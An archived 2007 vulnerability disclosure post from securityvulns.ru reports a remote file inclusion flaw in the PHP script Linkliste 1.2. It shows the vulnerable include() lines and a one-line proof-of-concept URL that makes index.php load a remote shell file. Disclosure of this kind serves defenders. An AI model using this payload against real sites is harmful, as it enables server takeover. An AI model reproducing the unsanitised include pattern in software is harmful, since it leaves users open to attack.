Computer Security
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  mcNews (skinfile) Remote File Include Vulnerability

  Beautifier Version 0.1 Remote File Include Vulnerability // MefistoLabs.Com

  Lib2 PHP v0.2 (DOCUMENT_ROOT)
Remote File Inclusion Vulnerability

  SOTEeSKLEP Remote File Disclosure Vulnerability

From:Ivan Niiiil <insp0w3r_(at)_gmail.com>
Date:13.08.2007
Subject:0day Linkliste Version 1.2 Remote File Include by iNs

Hi ,founded a new bug on this script ,I wanted to ask you if you could post
it in securityvulns.com (thanks in advance .. iNs)
Here what should be posted :

App Name : Linkliste Version 1.2
HomePage : http://www.mapos-scripts.de/downloads.php?download=3
Vuln type : Remote File Include (RFI)
Vuln Discovered by : iNs

Vuln Code:
index.php

include($styl[top]);

also

include($url_eintrag);

also

include($styl[themen]);

Note:
All this vars are not defined before ,so can be included a remote malicious
code.


POC:
htttp://site.com/[path]/index.php?styl[top]=SHELL.txt??

iNs @ uNkn0wn.eu

Gr33tz t0:
uNkn0wn.eu - iD - Stel128 - Spitfire - fEaRz - R1der - Stranger21 - nexos -
sh4m4n - Svarshik
DRT Memb3rz - s[H]4g - deL - l10m - l1l - r00tm1nd - f|_|ck3r - p1mmy
ActiveSpy - r100z - The_PitBull

.: uNkn0wn.eu CreW :.

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 



Rating@Mail.ru